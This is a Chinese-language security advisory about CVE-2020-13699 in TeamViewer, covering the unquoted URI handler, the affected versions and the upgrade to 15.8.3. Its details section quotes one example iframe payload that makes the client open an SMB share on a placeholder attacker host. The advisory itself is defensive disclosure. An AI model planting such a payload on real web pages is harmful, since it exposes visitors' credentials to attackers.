CVE-2020-13699:TeamViewer 用户密码破解漏洞风险通告

2020-08-11 10:33:18
TeamViewer官方发布了 TeamViewer URL 处理 的风险通告,该漏洞编号为 CVE-2020-13699,漏洞等级:高危,漏洞评分:8.8分。
【漏洞描述】
TeamViewer官方发布了 TeamViewer URL 处理 的风险通告,该漏洞编号为 CVE-2020-13699,漏洞等级:高危,漏洞评分:8.8分。

TeamViewer存在未引用的搜索路径或元素的安全缺陷,更具体地说,这是由于应用程序没有正确引用它的自定义URI处理程序,当安装了TeamViewer的易受攻击版本的用户访问恶意创建的网站时,可能会被黑客利用。

腾讯安全建议TeamViewer用户将TeamViewer升级到15.8.3版本,下载地址:https://www.teamviewer.com/en/download/previous-versions/

建议企业做好自查,避免内网遭遇黑客攻击。

TeamViewer是由德国公司TeamViewer GmbH开发的应用程序,可用于Windows,macOS,Linux,Chrome OS,iOS,Android,Windows RT Windows Phone 8和BlackBerry操作系统。主要用于远程访问和控制各种类型的计算机系统和移动设备,但也提供协作和演示功能(例如,桌面共享,Web会议,文件传输等)。
 
【漏洞等级】高危,cvss评分8.8

【漏洞详情】
TeamViewer存在未引用的搜索路径或元素的安全缺陷,更具体地说,这是由于应用程序没有正确引用它的自定义URI处理程序,当安装了TeamViewer的易受攻击版本的系统访问恶意创建的网站时,可能会被利用。

攻击者可以使用精心制作的URL(iframe src='teamviewer10: --play \\attacker-IP\share\fake.tvs')将恶意iframe嵌入网站中,从而启动TeamViewer Windows桌面客户端并强迫其打开远程SMB共享。 

【受影响的版本】
TeamViewer < 8.0.258861
TeamViewer < 9.0.28860
TeamViewer < 10.0.258873
TeamViewer < 11.0.258870
TeamViewer < 12.0.258869
TeamViewer < 13.2.36220
TeamViewer < 14.2.56676
TeamViewer < 15.8.3 

【漏洞修复建议】
腾讯安全专家建议用户升级到15.8.3版本,下载地址为:https://www.teamviewer.com/en/download/previous-versions/

【参考链接】
https://community.teamviewer.com/t5/Announcements/Statement-on-CVE-2020-13699/td-p/98448
https://www.helpnetsecurity.com/2020/08/06/cve-2020-13699/

最新资讯